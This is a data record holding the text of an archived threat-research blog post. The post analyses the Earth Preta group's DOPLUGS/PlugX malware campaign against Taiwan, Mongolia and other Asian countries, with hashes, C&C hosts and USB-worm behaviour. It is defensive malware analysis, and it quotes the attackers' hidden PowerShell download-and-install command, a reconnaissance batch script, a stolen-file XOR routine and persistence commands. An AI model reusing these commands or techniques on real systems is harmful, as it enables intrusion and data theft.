{ "id": "c7716fbd-9d4e-4d54-8246-2c77a77ec30d", "created_at": "2026-04-06T00:17:23.141253Z", "updated_at": "2026-04-10T03:36:33.917146Z", "deleted_at": null, "sha1_hash": "e4fd3b05fff6cc3c9f1f1499137b71dd531d7237", "title": "Earth Preta Campaign Uses DOPLUGS to Target Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1892285, "plain_text": "Earth Preta Campaign Uses DOPLUGS to Target Asia\r\nBy By: Sunny Lu, Pierre Lee Feb 20, 2024 Read time: 15 min (3952 words)\r\nPublished: 2024-02-20 · Archived: 2026-04-05 17:51:23 UTC\r\nAPT \u0026 Targeted Attacks\r\nIn this blog entry, we focus on Earth Preta's campaign that employed a variant of the DOPLUGS malware to target Asian\r\ncountries.\r\nIntroduction\r\nIn July 2023, Check Point disclosed a campaign called SMUGX, which focused on European countries and was attributed to\r\nthe advanced persistent threat (APT) group Earth Preta (also known as Mustang Panda and Bronze President). In the same\r\nyear, we obtained a phishing email targeting the Taiwanese government that contained a piece of customized PlugX malware\r\n— the same one used in the SMUGX campaign. As most previous discussions from other researchers focus on the European\r\nattacks, we would instead like to shed light on the Asian side of the campaign. After months of investigation, we discovered\r\nmore SMUGX campaign-related samples targeting not only Taiwan, but also Vietnam, Malaysia, and other Asian countries\r\nin 2022 and 2023.\r\nThis kind of customized PlugX malware has been active since 2022, with related research being published by Secureworks,\r\nRecorded Future, Check Point, and Lab52. During analysis, we observed that the piece of customized PlugX malware is\r\ndissimilar to the general typenews article of the PlugX malware that contains a completed backdoor command module, and\r\nthat the former is only used for downloading the latter. Due to its different functionality, we decided to give this piece of\r\ncustomized PlugX malware a new name: DOPLUGS.\r\nUpon investigation, we found that the DOPLUGS malware uses the KillSomeOne module, a USB worm that was first\r\ndisclosed by a Sophos reportnews article in November 2020. However, an entry from January 2020 mentioned a USB worm;\r\nthis entry was also the first report that analyzed a piece of PlugX malware integrated with KillSomeOne behavior.\r\nIn this blog entry, we focus on the Earth Preta campaign, providing an analysis of the DOPLUGS malware variant that the\r\ngroup used, including backdoor command behavior, integration with the KillSomeOne module, and its evolution.\r\nDecoys and victims\r\nBased on noteworthy DOPLUGS files we’ve found since July 2023 (Table 1), we can determine that the victims, at least for\r\nthe attacks that employed these specific samples, are from Taiwan and Mongolia. Based on the file names, it seems the files\r\nused for social engineering were related to current events, such as the Taiwanese presidential election that occurred in\r\nJanuary 2024.\r\nVT\r\nsubmission\r\ndate\r\nLNK file name Download link in the LNK file MSI file File name  \r\nJuly 7,\r\n2023\r\nҮер усны\r\nсэрэмжлүүлэг.lnk\r\n(“Flood warning”\r\nin Mongolian)\r\nhttps://estmongolia[.]com/Үер\r\nусны сэрэмжлүүлэг\r\n5f5c3b.msi\r\nOneNoteM.exe\r\nmsi.dll\r\nNoteLogger.dat\r\nҮер усны\r\nсэрэмжлүүлэг.pdf\r\nAug. 17,\r\n2023\r\n選舉民意調查研\r\n究問卷.lnk\r\n(“Election poll\r\nresearch\r\nquestionnaire” in\r\nhttps://getfiledown[.]com/utdkt N/A N/A N/A\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 1 of 24\n\ntraditional\r\nChinese)\r\nAug. 18,\r\n2023\r\n水源路二至五期\r\n整建住宅都市更\r\n新推動說明.lnk\r\n(“Explanation of\r\nUrban Renewal\r\nInitiative for\r\nResidential\r\nDevelopment in\r\nPhases Two to\r\nFive of Shuiyuan\r\nRoad” in\r\ntraditional\r\nChinese)\r\nhttps://getfiledown[.]com/vgbskgyu 6460c7.msi\r\nOneNoteM.exe\r\nmsi.dll\r\nNoteLogger.dat\r\n水源路二至五期\r\n整建住宅都市更\r\n新推動說明.pdf\r\nSept. 9,\r\n2023\r\n郭台銘選擇賴佩\r\n霞為總統副手深\r\n層考量.lnk\r\n(\"Mate: A\r\nThoughtful\r\nConsideration” in\r\ntraditional\r\nChinese)\r\nhttps://getfilefox[.]com/enmjgwvt enmjgwvt OneNoteM.exe\r\n郭台銘選擇賴佩\r\n霞為總統副手深\r\n層考量.pdf\r\nTable 1. Noteworthy DOPLUGS files, with some referencing the 2024 Taiwan elections\r\nThe content of the decoy file 水源路二至五期整建住宅都市更新推動說明.pdf is related to an urban renewal project in\r\nTaiwan (written in traditional Chinese).\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 2 of 24\n\nFigure 1. The decoy document “水源路二至五期整建住宅都市更新推動說明.pdf”\r\nThe decoy file Үер усны сэрэмжлүүлэг.pdf involves a flood warning in Mongolia, written in Mongolian.\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 3 of 24\n\nFigure 2. The decoy document “Үер усны сэрэмжлүүлэг.pdf”\r\nLooking at VirusTotal data (targeting Asia) from 2022 to 2023, we observed that perpetrators of the campaign primarily\r\ntargeted Taiwan and Vietnam, with lower counts from other Asian countries like China, Singapore, Hon Kong, Japan, India,\r\nMalaysia, and Mongolia. \r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 4 of 24\n\nFigure 3. Submission count of DOPLUGS on VirusTotal in Asia.\r\nSpear-phishing emails as Initial Access\r\nThe spear-phishing emails sent to victims are embedded with a Google Drive link that hosts a password-protected archive\r\nfile, which will download DOPLUGS malware. Figure 4 shows a sample email. \r\nFigure 4. Screenshot of a spear-phishing email containing a message regarding the urban renewal project in\r\nTaiwan\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 5 of 24\n\nFigure 5. The Google Drive link embedded in the phishing email; the name of the RAR file on top translates\r\nto “Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan\r\nRoad (attachment password:2024).rar”\r\nThe malicious Windows shortcut files (LNK) seen in Table 1 are as disguised as documents and archived in an RAR file.\r\nThe target command in the LNK file is as follows:\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe   -windowstyle hidden $install=New-Object -ComObject\r\n'WindowsInstaller.Installer';$install.uilevel =\r\n2;$install.InstallProduct('https://getfiledown[.]com/vgbskgyu','REMOVE=ALL');$install.InstallProduct('https://getfiledown[.]com/vgbskgy\r\n.\\SsEWyTjKIfqnOTtTycNpSuEH.pdf\r\nWhen the victim selects the LNK file, a MSI file will be downloaded from https://getfiledown[.]com/vgbskgyu, after which\r\nit will drop the following files for further execution:\r\n%localappdata%\\MPTfGRunFbCn\\OneNotem.exe (legitimate executable)\r\n%localappdata%\\MPTfGRunFbCn\\msi.dll (malicious DLL file)\r\n%localappdata%\\MPTfGRunFbCn\\NoteLogger.dat (encrypted payload)\r\nAnalysis of the tools used in the campaign\r\nIn this section we will go through the detailed analysis of DOPLUGS, DOPLUGS with the KillSomeOne module, and the\r\ngeneral type of the PlugX malware. Before introducing the malware, we would like to summarize all the published reports\r\nrelated to the analysis in this section, using the timeline here for reference:\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 6 of 24\n\nFigure 6. Timeline of the malware evolution.\r\nThe timeline indicates the publishing time, the title and source of the report, and the related malware family.\r\nThe DOPLUGS downloader\r\nDOPLUGS is a downloader with four backdoor commands, one of the commands is designed to download the general type\r\nof the PlugX malware. The details of the payload decryption and execution flow were previously discussed by Lab52 in\r\nDecember 2023. Our own analysis will instead focus on backdoor behavior.\r\nFigure 7. Infection flow of DOPLUGS\r\nTable 2 shows the list of files that are part of the infection flow.\r\nFile name SHA256 Detection name\r\n水源路二至五\r\n期整建住宅都\r\n1a8aeee97a31f2de076b8ea5c04471480aefd5d82c57eab280443c7c376f8d5c Trojan.LNK.DOPLINK.ZTKI\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 7 of 24\n\n市更新推動說\r\n明.lnk \r\n(Explanation of\r\nUrban Renewal\r\nInitiative for\r\nResidential\r\nDevelopment\r\nin Phases Two\r\nto Five of\r\nShuiyuan\r\nRoad.lnk) \r\n6460c7.msi 364f38b48565814b576f482c1e0eb4c8d58effcd033fd45136ee00640a2b5321 Backdoor.Win32.DOPLUGS.ZTKI\r\nOneNotem.exe b9836265c6bfa17cd5e0265f32cedb1ced3b98e85990d000dc8e1298d5d25f93  \r\nmsi.dll f8c1a4c3060bc139d8ac9ad88d2632d40a96a87d58aba7862f35a396a18f42e5 Trojan.Win32.DOPLUGS.ZTKI\r\nNoteLogger.dat a5cd617434e8d0e8ae25b961830113cba7308c2f1ff274f09247de8ed74cac4f Backdoor.Win32.DOPLUGS.ZTKI.e\r\nTable 2. File list of the LNK file “水源路二至五期整建住宅都市更新推動說明,” which translates to “Explanation of Urban Renewal Initiative for\r\nResidential Development in Phases Two to Five of Shuiyuan Road”\r\nSince 2018, Earth Preta has constantly updated the backdoor command sets in the PlugX malware, which has at least four\r\ngenerations according to our observations:\r\n1. PlugX (No given name for this version)\r\n2. REDDELTA\r\n3. Hodur\r\n4. DOPLUGS\r\nIn summary, the backdoor command for the first three versions can be divided into two groups. The first group (0x1001)\r\ncontains the functions customized by the threat actor, while the second group (0x1002) is copied from the general type of the\r\nPlugX malware. However, in DOPLUGS (the latest version), the backdoor command set only has four commands, with the\r\nfunctions shown in Figure 8.\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 8 of 24\n\nFigure 8. The DOPLUGS backdoor commands\r\nBackdoor\r\ncommand\r\nFunctionality\r\n0x7002\r\nStarts a CMD shell. The function is directly copied from shell module in the general type of the\r\nPlugX malware\r\n0x1007\r\nSplits the data from the command-and-control (C\u0026C) server by ',',  with the following data format:\r\n{WINHTTP_OPTION_CONNECT_TIMEOUT},{sleep_time},\r\n{WINHTTP_OPTION_SEND_TIMEOUT},{sleep_time} or\r\n{WINHTTP_OPTION_RECEIVE_TIMEOUT},{sleep_time}\r\n0x3004\r\nDownloads files from the C\u0026C server, including DLL, EXE and DAT, which are the general type\r\nof the PlugX malware\r\n0x1005\r\nDeletes persistence:\r\nDeletes registry key (HKCU | HKLM) Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nDeletes itself by creating and executing a batch file del_OneNoteUpdate.bat in %temp%\r\nTable 3. DOPLUGS backdoor commands.\r\nFigure 9. Code inside the “del_OneNote Update.bat” batch script\r\nWhether sending or receiving data to and from the C\u0026C server, it will be encrypted or decrypted with the RC4 algorithm,\r\nwhich is 0x20 bytes retrieved from the C\u0026C server (however, it is not fixed).\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 9 of 24\n\nWe also observed another variant (dca39474220575004159ecff70054bcf6239803fcf8d30f4e2e3907b5b97129c) that has\r\ndifferent backdoor command values, but with the same functionality (shown in Table 4).\r\nBackdoor\r\nCommand\r\nFunctionality\r\n0x7002\r\nStart a CMD shell. The function is directly copied from Shell module in the general type of the\r\nPlugX\r\n0x10000001\r\nSplit the data from C2 by ',', with the data format:\r\n{WINHTTP_OPTION_CONNECT_TIMEOUT},{sleep_time},\r\n{WINHTTP_OPTION_SEND_TIMEOUT},{sleep_time},\r\nor\r\n{WINHTTP_OPTION_RECEIVE_TIMEOUT},{sleep_time}\r\n0x3004\r\nDownloads files from the C\u0026C server, including DLL, EXE and DAT, which are the general type\r\nof the PlugX malware\r\n0x1005\r\nDeletes persistence:\r\nDeletes registry key (HKCU | HKLM) Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nDeletes itself in via creating and executing a batch file del_Acrobat Update.bat in %temp%\r\nTable 4. Another version of the DOPLUGS backdoor commands\r\nInterestingly, this DOPLUGS version abuses legitimate Adobe application to lure victims (with most of the samples\r\nVirusTotal sourced from Vietnam). According to the evolution of the backdoor command, we suspect that the original\r\npurpose of the 0x1002 group in the previous version is for file delivery only. This also explains why the 0x1002 group has\r\nbeen removed from this version, since the downloader behavior for the next-stage payload is replaced by the 0x3004\r\nbackdoor command.\r\nThe general type of the PlugX malware\r\nIn this section, we will introduce the general type of the PlugX malware that is downloaded via the backdoor command\r\n0x3004 in DOPLUGS. Fortunately, we were able to download two types of final payloads from the C\u0026C server for our\r\nanalysis. Table 5 shows the downloaded files.\r\nC\u0026C server source Type File name Description PlugX C\u0026C server\r\nelectrictulsa[.]com:443 1\r\nadobe_licensing_wf_helper.exe\r\nLegitimate\r\nexecutable\r\nfor\r\nsideloading\r\nweb[.]bonuscave[.]com:8080\r\nlibcef.dll\r\nMalicious\r\nloader\r\nlicensing.dat\r\nEncrypted\r\npayload\r\nivibers[.]com:443 or\r\nmeetviberapi[.]com:443\r\n2\r\nAvastsz.exe\r\nLegitimate\r\nexecutable\r\nfor\r\nsideloading\r\nwww[.]markplay[.]net:8080\r\nimages[.]markplay[.]net:443\r\nSZBrowser.dll\r\nMalicious\r\nloader\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 10 of 24\n\nlog.dat\r\nEncrypted\r\npayload\r\n149[.]104[.]12[.]64:443 2\r\nAvastsz.exe\r\nLegitimate\r\nexecutable\r\nfor\r\nsideloading\r\nnews[.]comsnews[.]com:443\r\nnews[.]comsnews[.]com:5938\r\nimages[.]kiidcloud[.]com:443\r\n127[.]0[.]0[.]1:8080\r\n127[.]0[.]0[.]1:8000\r\nSZBrowser.dll\r\nMalicious\r\nloader\r\nlog.dat\r\nEncrypted\r\npayload\r\nTable 5. List of general PlugX malware types downloaded via DOPLUGS\r\nAccording to a report published by Palo Alto, these samples of the general PlugX malware might be modified from the\r\nTHOR PlugX based on the following observations:\r\n1. Both have a similar code structure in DLL loaders.\r\n2. Both have the same shellcode before entering the PlugX main function.\r\n3. Both have the same argument in the command-line execution.\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 11 of 24\n\nFigure 10. The function to enter the shellcode in the loader of the THOR PlugX malware (top) and the Earth\r\nPreta general type of the PlugX malware (bottom)\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 12 of 24\n\nFigure 11. The shellcode of the THOR PlugX malware (top) and the Earth Preta general type of the PlugX\r\nmalware (bottom)\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 13 of 24\n\nFigure 12. The arguments used in command line of THOR PlugX malware (top) and Earth Preta general type\r\nof the PlugX malware (bottom)\r\nFile name SHA256\r\nadobe_licensing_wf_helper.exe 93624d0ad03998dd267ae8048ff05e25b5fd5f7b4116a2aff88c87d42422d5dc\r\nlibcef.dll 583941ca6e1a2e007f5f0e2e112054e44b18687894ac173d0e93e035cea25e83\r\nlicensing.dat e3bae2e2b757a76db92ab017328d1459b181f8d98e04b691b62ff65d1e1be280\r\nTable 6. File list of the type 1 general type of the PlugX malware\r\nWhen the adobe_licensing_wf_helper.exe file is launched by DOPLUGS, the command line will not have any argument. The\r\nexecution flow is as follows:\r\n1. The adobe_licensing_wf_helper.exe file is for installation and setting persistence.\r\n2. The adobe_licensing_wf_helper.exe 600 0 file injects itself into %SystemRoot%\\system32\\WerFault.exe with\r\narguments 601 0.\r\n3. The \"%SystemRoot%\\system32\\WerFault.exe 601 0 file executes the backdoor command.\r\nHere is the functionality of each first argument:\r\nFirst\r\nargument\r\nFunctionality\r\nNone Same as the condition (100)\r\n100\r\nSets persistence:\r\nInstalls files into %ProgramFiles%\\Common Files\\Adobe Licensing Helper\r\nCreates service with the name \"Adobe Licensing Helper\"\r\nCommand line: %ProgramFiles%\\Common Files\\Adobe Licensing\r\nHelper\\adobe_licensing_wf_helper.exe 600 0Creates registry\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run with name \"Adobe Licensing Helper\"\r\nCommand line: %ProgramFiles%\\Common Files\\Adobe Licensing\r\nHelper\\adobe_licensing_wf_helper.exe 600 0\r\n600 Injects the PlugX process into %SystemRoot%\\system32\\WerFault.exe with the arguments 601 0\r\n601 Executes the backdoor command of the general type of the PlugX malware\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 14 of 24\n\n609 Receives the backdoor command from pipe and sends the result into the main process in pipe\r\nTable 7. The functionalities of each first argument\r\nFile name SHA256\r\nAvastsz.exe b975af70ee9bdfdc6e491b58dd83385f3396429a728f9939abade48d15941ea1\r\nSZBrowser.dll 60b3a42b96b98868cae2c8f87d6ed74a57a64b284917e8e0f6c248c691d51797\r\nlog.dat eb9e557fac3dd50cc46a544975235ebfce6b592e90437d967c9afba234a33f13\r\nTable 8. File list of the type 2 general type of the PlugX malware\r\nThe command-line argument is replaced from 6xx to 7xx but keeps the same functionality.\r\nFigure 13. The arguments used in the command line of type 2 PlugX\r\nAnother part is the configuration decryption. In the type 1 PlugX malware, the configuration section is shown in plain text\r\nafter decryption, but for type 2, it’s still encrypted. The configuration data will need to be decrypted again with the RC4 key\r\nqwedfgx202211 only when the process needs it.\r\nFigure 14. The encrypted C\u0026C server in the configuration (shown as “www.markplay[.]net” when decrypted)\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 15 of 24\n\nFigure 15. Encrypted installation directory in the configuration (“%ProgramFiles%\\Common\r\nFiles\\System\\Avast” when decrypted)\r\nFigure 16. The encrypted registry name in the configuration (Avast Browser Service when decrypted)\r\nOffset Value\r\n +0x10 \r\nFile extensions that are read by the keylogger:  \r\n*.doc*\r\n*.pdf\r\n*.xls\r\n*.ppt*\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 16 of 24\n\n*.mp3\r\n*.wav\r\n+0x828 C\u0026C list\r\n+0xD58 Install directory\r\n+0xF58 Registry Name\r\n+0x1158 Service Name\r\n+0x1358 Service Name\r\n+0x1558 RC4 Key for packet\r\nTable 9. The configuration structure of the type 2 PlugX malware\r\nIntegration with KillSomeOne\r\nWhile hunting for more DOPLUGS related samples, we came across a DOPLUGS variant with KillSomeOne functionality.\r\nThe KillSomeOne module is a plug-in specializing in malware distribution, information collection, and document theft via\r\nUSB. It expands the ability for infection so that initial access methods are not limited to phishing or decoy documents.\r\nThe KillSomeOne module was first introduced in a November 2020 Sophos reportnews article. The DOPLUGS variant with\r\nthe KillSomeOne module has high similarities with the previous DOPLUGS variant we analyzed, with one of the major\r\ndifferences being the infection method. It has four components: a legitimate executable, a malicious DLL, an encrypted\r\npayload, and an encrypted PE file. This variant has an extra launcher file that executes the legitimate executable to perform\r\nDLL-sideloading behaviors.\r\nArchive File name  Description\r\n1.rar\r\n(a0c94205ca2ed1bcdf065c7aeb96a0c99f33495e7bbfd2ccba36daebd829a916)\r\nHPSmart.exe\r\nlegitimate\r\nEXE\r\nInstanceFinderDlgUI.dll\r\nmalicious\r\nDLL\r\nInstanceFinderDlg.dat\r\nencrypted\r\npayload\r\nHPReport.exe\r\nencrypted\r\nlauncher\r\nTable 10. File list of the DOPLUGS variant with the KillSomeOne module\r\nThe loader InstanceFinderDlgUI.dll, compiled by Golang, is the only one we found. Figure 20 shows its functions.\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 17 of 24\n\nFigure 17. Golang functions of the file “InstanceFinderDlgUI.dll”\r\nIts execution flow is as follows:\r\nIt reads the encrypted payload, InstanceFinderDlg.dat in the same folder.\r\nIt decrypts the encrypted payload by XOR with the single key, 0x73.\r\nIt enters the decrypted payload by main_NTCreateThreadEx.\r\nThe payload process is similar to the regular DOPLUGS variant. The function checks the argument of the command line\r\nHPSmart.exe “argument”. There is no argument in the first execution: It only sets up persistence and relaunches itself with\r\nthe argument, which is  the three-digit random number. We list the command-line arguments and their corresponding\r\nbehavior in the following table:\r\nArgument Behavior\r\nNo argument Sets up persistence\r\nXXX (Random three digit\r\nnumber)\r\nKillSomeOne thread / DOPLUGS backdoor behavior\r\n-net\r\nSets up persistence / Sets the value of key registry\r\nSystem\\CurrentControlSet\\Control\\Network\\Version to “1”\r\n“1” “0” Enables Wi-Fi connection\r\nTable 11. The behavior of each command-line argument\r\nPersistence is set up via the following steps:\r\n1. The function copies all the files to the installation directory, C:\\Users\\Public\\HPSmartMZWx\\.\r\n2. It sets up the value C:\\Users\\Public\\HPSmartMZWx\\HPSmart.exe xxx in the registry\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run key for persistence.\r\n3.  It creates Process C:\\Users\\Public\\HPSmartMZWx\\HPSmart.exe xxx.\r\nThe KillSomeOne thread has two major behaviors, the first of which removes all traces related to previous pieces of PlugX\r\nmalware, including files, process, registry, and scheduled tasks.\r\nDeleted object Target name list\r\nProcess with corresponding folder and persistence in registry Adobe Desktop Service.exe\r\nidentity_helper.exe\r\npidgin.exe\r\nWaveeditsNero.exe\r\nsvchost.exe (if no argument)\r\nWaveeditNero.exe\r\ngup.exe\r\nSilverlight.Configuration.exe,\r\nwaveedit.exe\r\nwaveedits.exe\r\nAdobe_licensing_wf.exe\r\nadobe_wf.exe\r\nMicrosoftEdges.exe\r\nOpera.exe\r\nWeChat.exe\r\nsymantecs.exe\r\nSymantec.exe\r\nmsexpert.exe\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 18 of 24\n\nvivaldi.exe\r\nCUZ.exe\r\nRzCef.exe\r\nCefRender.exe\r\nRzProcess.exe\r\nRzerProcess.exe\r\nservice_host.exe\r\nmfpmp.exe\r\nScheduled tasks\r\nudisk_1\r\nudisk_2\r\nZBT_0.1\r\nLKUFORYOU_1\r\nAcroRd32\r\nudisk_1.00\r\nLKUFORYOU_2\r\nudisk_1.03\r\nudisk_1.02\r\nAdobeDesktop\r\nKey in registry (HKCU|HKLM)\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run key\r\nRazer\r\nRzCef\r\nCefRender\r\nRzerProcess\r\nCefRz\r\nX32dbg\r\nvstool_x86\r\nWindowsNT\r\nnvcplui\r\nNeroEdit\r\nAdobeDesktop\r\nFolder\r\nC:\\Users\\Public\\AdobeDesktop\\,\r\nC:\\ProgramData\\Razer\\,\r\nC:\\ProgramData\\RazerCefProcess\\,\r\nC:\\ProgramData\\CefRz\\,\r\nC:\\ProgramData\\DebugReport\\,\r\nC:\\programData\\RzerProcess\\,\r\nC:\\ProgramData\\SymantecSEndpoint\\Bin\\\r\nFile\r\nC:\\ProgramData\\FmtOptions.dll” (possibly related to\r\nLuminousMouth)\r\nTable 12. Removing traces of the previous piece of PlugX malware\r\nThe second behavior is related to USB infection. It applies the API DeviceIoControl  with the parameter 0x2d1400 to\r\nidentify the USB drive. It then creates three threads in the targeted USB drive, which we detail in the following sections.\r\nThread 1: Worm behavior in USB drive (Lateral Movement)\r\nThis thread creates the mutex USB_NOTIFY3_INF_{USB_volume} for mark. Before the worm behavior, these registries are\r\nenabled to hide the file extension and the folders that contain malware and stolen documents.\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced, Hidden=0\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced, ShowSuperHidden=0\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced, HideFileExt=1\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 19 of 24\n\nIn infected USB drives, the four components are copied into the hidden folder.\r\nHPReport.exe to {USB_volume}:\\Usb Drive\\1.0\\5.dat\r\nHPSmart.exe to {USB_volume}:\\Usb Drive\\1.0\\6.dat\r\nInstanceFinderDlgUI.dll to {USB_volume}:\\Usb Drive\\1.0\\2.dat\r\nInstanceFinderDlg.dat to {USB_volume}:\\Usb Drive\\1.0\\InstanceFinderDlg.dat\r\nFigure 18. The copied 4 files in a USB drive.\r\nThe decrypted launcher, HPReport.exe, is copied to {USB_volume}:\\Usb Disk ({free space of USB}).exe, (which is disguised\r\nas a USB drive) and duplicated with the name opn-U({free space of USB}).cmd.to the following folders:\r\n{USB_volume}:\\AVAST\\Protection for Autorun\\\r\n{USB_volume}:\\SMADAV\\SMADAV\\\r\n{USB_volume}:\\Removable Disk\\\r\nThe KillSomeOne module specializes in USB infections. The launcher pretends to be a fake USB disk to lure victims into\r\nselecting it — a convincing guise unless users check the extension. The purpose of the launcher is simple: It renames 2.dat\r\nto InstanceFinderDlgUI.dll and executes 6.dat, which is the executable file that will sideload the InstanceFinderDlgUI.dll\r\nfile via DLL sideloading.\r\nFigure 19. The decrypted launcher in the USB drive\r\nAll the files under these folders will be copied to {USB_volume}:\\Usb Disk\\:\r\n{USB_volume}:\\\r\n{USB_volume}:\\Kaspersky\\\r\n{USB_volume}:\\Kaspersky\\Usb Drive\\\r\n{USB_volume}:\\Usb Drive\\3.0\\\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 20 of 24\n\n{USB_volume}:\\Kaspersky\\Removable Disk\\ (Including files in subfolder)\r\n{USB_volume}:\\AVAST\\Protection for Autorun\\ (Including files in subfolder)\r\n{USB_volume}:\\SMADAV\\SMADAV\\ (Including files in subfolder)\r\nThis thread creates the mutex, USB_NOTIFY3_COP_{USB_volume}, for mark. There are two kinds of stealing conditions,\r\neach of which we discuss here:\r\nIf the connection succeeds in connecting to https://www.microsoft.com/, it will check the file extensions in these predefined\r\nfolders:\r\n{USB_volume}:\\Kaspersky\\Usb Drive\\1.0\\\r\n{USB_volume}:\\Usb Drive\\1.0\\\r\n{USB_volume}:\\.System\\Device\\USB\\3.0\\Kaspersky\\Usb Drive\\1.0\r\n{USB_volume}:\\.System\\Device\\USB\\3.0\\Usb Drive\\1.0\\\r\nIf the file extensions are not .cmd, .bat, or .dll and the file name is not RECYCLERS.BIN, it will transfer the file to\r\n%userprofile%\\AppData\\Roaming\\Render\\1.0\\  and empty the content of the original file.\r\nWe also found another functionality, but it seems that it has not been implemented as of this writing. This functionality\r\ncollects all files under the same folders and looks for the files with the following extensions:\r\n.doc\r\n.docx\r\n.ppt\r\n.pptx\r\n .xls\r\n.xlsx\r\n.pdf\r\nAfterward, it will encode the file name with base64, encrypt the file content, and copy the file to the folder of the current\r\nprocess.\r\nHere is the XOR algorithm to encrypt the stolen files:\r\nencrypted_contents = []\r\nencrypted_key = 0x6D\r\nfor i in range(len(contents)):\r\n    encrypted_contents.append(contents[i] ^ encrypted_key)\r\n    encrypted_key += 0xAA\r\nIf the connection fails, the thread checks the value in registry\r\n(HKCU|HKLM)\\System\\CurrentControlSet\\Control\\Network\\Version, which does not exist. Afterward, it creates and\r\nexecutes the batch script %temp%\\edg{value of QueryPerformanceCounter}.bat to collect the information of the victim.\r\n%comspec% /q /c systeminfo \u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\n%comspec% /q /c ipconfig /all \u003e\u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\n%comspec% /q /c netstat -ano \u003e\u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\n%comspec% /q /c arp -a \u003e\u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\n%comspec% /q /c tasklist /v \u003e\u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\ndel %0\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 21 of 24\n\nThe output data will then be encrypted and dropped to {USB_volume}:\\Usb Drive\\1.0\\ {value of SOFTWARE\\CLASSES\\ms-pu\\CLSID}.dat.\r\nThis thread creates the mutex, USB_NOTIFY_BAT_H3_{USB_volume} for mark, which will be executed only under these\r\nconditions:\r\nWhen connection with https://www.microsoft.com fails\r\nWhen there is no value in System\\\\CurrentControlSet\\\\Control\\\\Network\\\\version (this registry is enabled when\r\nargument of cmd line = “-net”)\r\nThe thread will search all batch scripts inside the following folders:\r\n{USB_volume}:\\Usb Drive\\1.0\\p\\\r\n{USB_volume}:\\Kaspersky\\Usb Drive\\1.0\\p\\\r\n{USB_volume}:\\.System\\Device\\USB\\3.0\\Usb Drive\\1.0\\p\\\r\nIf the batch script name does not contain the strings tmpc_ or tmp_, the script will be decrypted via XOR algorithm, which is\r\nthe same as the file encryption in the thread 2 subsection. The new batch will then be created in %temp%\\{value of\r\nQueryPerformanceCounter}.bat and executed by ShellExecuteW with the following contents:\r\n{USB_volume}\r\ncd \"{USB_volume}:\\target folder\\\"\r\n{decrypted contents in batch file}\r\ndel %0\r\nDOPLUGS backdoor behavior (Command and Control)\r\nThis behavior is the same as the original piece of DOPLUGS malware and is responsible for C\u0026C communication,\r\nbackdoor commands, and downloading the next-stage general type of the PlugX malware.\r\nThe following command line is executed to set up scheduled tasks to enable Wi-Fi connection:\r\ncmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn \"Security WIFI Script\" /tr \"netsh interface set interface\r\n\"\"\"Wireless Network Connection\"\"\" enabled\" /ru SYSTEM /F\u0026schtasks.exe /run /tn \"Security WIFI Script\" \r\ncmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn \"Security WIFI2 Script\" /tr \"netsh interface set interface\r\n\"\"\"Wireless Network Connection 2\"\"\" enabled\" /ru SYSTEM /F\u0026schtasks.exe /run /tn \"Security WIFI2 Script\" \r\ncmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn \"Security WIFI3 Script\" /tr \"netsh interface set interface\r\n\"\"\"Wireless Network Connection 3\"\"\" enabled\" /ru SYSTEM 